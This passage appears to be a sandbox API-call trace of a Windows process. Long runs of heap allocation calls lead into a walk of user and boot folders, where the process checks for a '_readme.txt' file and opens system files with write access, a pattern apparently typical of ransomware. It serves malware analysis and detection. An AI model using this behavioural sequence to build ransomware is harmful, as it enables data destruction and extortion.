dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9138 | out: hHeap=0x4970000) returned 1 [0129.913] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9138 [0129.913] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9138 | out: hHeap=0x4970000) returned 1 [0129.914] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0129.914] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2a10 | out: hHeap=0x4970000) returned 1 [0129.916] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.916] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.916] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.916] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.916] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0129.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.916] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.916] PathFindFileNameW (pszPath="") returned="" [0129.916] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.917] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.917] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.917] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9610 | out: hHeap=0x4970000) returned 1 [0129.918] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.918] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.918] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0129.918] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0129.918] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0129.918] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0129.918] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.918] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0129.919] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0129.919] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0129.919] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.919] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.919] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.919] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.919] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.919] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0129.919] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.919] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.919] PathFindFileNameW (pszPath="") returned="" [0129.919] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.920] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.920] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.920] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.920] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0129.921] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0129.921] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.921] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.921] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.921] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0129.921] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.922] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0129.922] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.922] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned=".txt" [0129.922] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0129.922] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.922] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.922] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.922] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.922] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.922] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.922] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.922] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: 